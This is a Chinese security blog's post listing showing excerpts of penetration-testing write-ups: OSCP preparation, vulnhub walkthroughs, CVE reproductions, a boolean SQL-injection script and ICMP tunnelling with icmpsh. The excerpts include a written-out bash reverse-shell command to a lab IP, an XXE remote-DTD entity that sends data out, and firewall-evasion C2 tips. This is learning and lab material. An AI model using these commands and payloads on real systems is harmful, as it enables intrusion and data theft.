- 博客(32)
- 收藏
- 关注
原创 OSCP备考分享
我于今年 10 月 14 号重于通过了 OSCP 考试,想着记录和分享一下我通过 OSCP 考试的经历和心路历程,供想要考这个证书的朋友进行参考。关于 OSCP 介绍和备考资源之类的,网上已经有很多了,这里就不再重复了,感兴趣的朋友自行搜索。首先说下个人的技术背景,我属于半路出家进入安全行业,仅凭兴趣两眼一抹黑就冲进来了。后面也基本在甲方做安全运维、安全测试和体系建设的工作,属于没有攻防实践经验的,但是因为做过安全测试,对漏洞原理和一些工具的使用还是有些基础的(主要是web方向)。
2024-10-20 23:43:17
763
原创 【打靶练习】vulnhub: Insanity-Hosting
Insanity-Hosting打靶记录,二次sql注入、firefox本地密码提取
2024-03-19 10:24:27
598
原创 【打靶练习】vulnhub Sar: 1
方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行。收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html。发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写。同时,发现存在文件上传功能,但是不知道上传路径无法直接利用。经过搜索,发现文件上传路径为/var/www/html/
2023-06-13 14:42:10
214
原创 【Vulnhub靶场实践】 Red:1
保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。
2022-07-19 15:01:44
1189
原创 CVE-2022-22965 漏洞复现学习
漏洞利用条件JDK 9+Spring 及其衍生框架使用Tomcat部署spring项目使用了POJO参数绑定Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本环境搭建Java 靶场JDK 11(必须9及9以上)Tomcat 8首先需要个实体类sdfsdfpublic class HelloWorld { private String message; public String getM
2022-04-30 21:27:30
3286
原创 CVE-2014-3529
一、 漏洞影响poi-ooxml3.10及以下二、环境搭建1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.
2022-02-28 22:04:06
5268
1
原创 Shiro反序列化漏洞研究
shiro反序列化漏洞研究实践,shiro-550 POC,shiro-721破解过程剖析,为什么shiro-721需要登录才能利用?
2021-10-31 23:11:10
465
原创 Linux反弹 shell 命令解析
Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。
2021-08-29 22:57:20
680
原创 shiro认证绕过:CVE-2020-(1957,17523)
Apache Shiro多个版本中存在认证绕过漏洞。攻击者可构造特殊的请求绕过身份验证访问目标服务。
2021-08-12 22:42:47
1201
原创 Freemarker模板注入:CVE-2020-7477
一、漏洞名称:FusionAuth存在Freemarker模板注入导致远程命令执行二、漏洞编号:CVE-2020-7477三、漏洞描述:在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。四、影响版本:FusionAuth <= 1.11.0五、漏洞分析通过对直接编辑freemarker模板,调用freemarker.template.utility.E
2021-08-04 21:06:48
2487
原创 XML注入:CVE-2020-29436
一、漏洞名称:Nexus Repository Manager 3 XML外部实体注入二、漏洞编号:CVE-2020-29436三、漏洞描述:2020年12月16日,360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞 的风险通告,该漏洞编号为 CVE-2020-29436 ,漏洞等级:高危 ,漏洞评分:8.7 。拥有管理员权限的远程攻击者通过 构造特定的XML请求 ,可造成 XML外部实体注
2021-07-21 21:58:14
785
2
原创 SQL注入:布尔注入脚本
SQL注入:布尔注入脚本实现思路将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。数据库名:获取库名长度,库名数据库表:获取数据库表数量,表名长度,表名表字段:获取字段数,字段名长度,字段名表数据:获取该字段数据行数,数据长度,数据内容关键代码获取不同数据的payload字典payload_dict = { "db_name_len":
2021-07-19 21:02:05
946
1
原创 提权:CVE-2021-3560
CVE-2021-3560一、漏洞名称:Linux Polkit权限提升漏洞二、漏洞编号:CVE-2021-3560三、漏洞描述:由于linux的polkit组件错误处理了异常情况,导致权限提升。该漏洞能够使普通用户获取到root权限。四、影响版本:目前已知的版本情况。五、漏洞分析当一个命令被发送到目标程序处理时,消息发送方会被分配一个唯一总线名称(感觉有点像sessionid的意思)。当需要polkit去做权限校验时,polkit会通过唯一总线名称去查询命令发送方的U
2021-07-12 21:05:14
1205
原创 icmpsh使用
ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。下载地址:https://github.com/bdamele/icmpsh使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh
2021-07-11 15:14:47
1118
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人